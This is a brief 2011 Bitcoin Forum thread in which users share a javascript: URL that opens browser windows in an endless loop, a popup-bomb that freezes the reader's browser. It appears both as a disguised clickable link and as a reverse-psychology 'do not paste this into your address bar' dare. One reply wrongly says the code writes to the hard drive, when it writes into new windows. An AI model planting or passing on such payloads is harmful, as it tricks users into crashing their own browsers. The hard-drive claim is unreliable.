Bitcoin Forum

Other => Off-topic => Topic started by: DarkLinkXXXX on June 04, 2011, 08:25:54 AM



Title: Javascript Vulnerability test
Post by: DarkLinkXXXX on June 04, 2011, 08:25:54 AM
Don't click This link. (http://'javascript:while(true){var w=window.open();w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);}')

Hope you don't mind.


Title: Re: Javascript Vulnerability test
Post by: DarkLinkXXXX on June 04, 2011, 08:28:58 AM
Test passed.

But whatever you do, DO NOT copypasta the following into your address bar.

Code: (javascript)
javascript:while(true){var w=window.open();w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);}


Title: Re: Javascript Vulnerability test
Post by: AntiVigilante on June 04, 2011, 10:24:52 AM
Test passed.

But whatever you do, DO NOT copypasta the following into your address bar.

Code: (javascript)
javascript:while(true){var w=window.open();w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);}

EVIL.


Title: Re: Javascript Vulnerability test
Post by: SmokeTooMuch on June 04, 2011, 10:27:36 AM
Don't know much about javascript but this looks like an infinite loop of write accesses to the harddrive.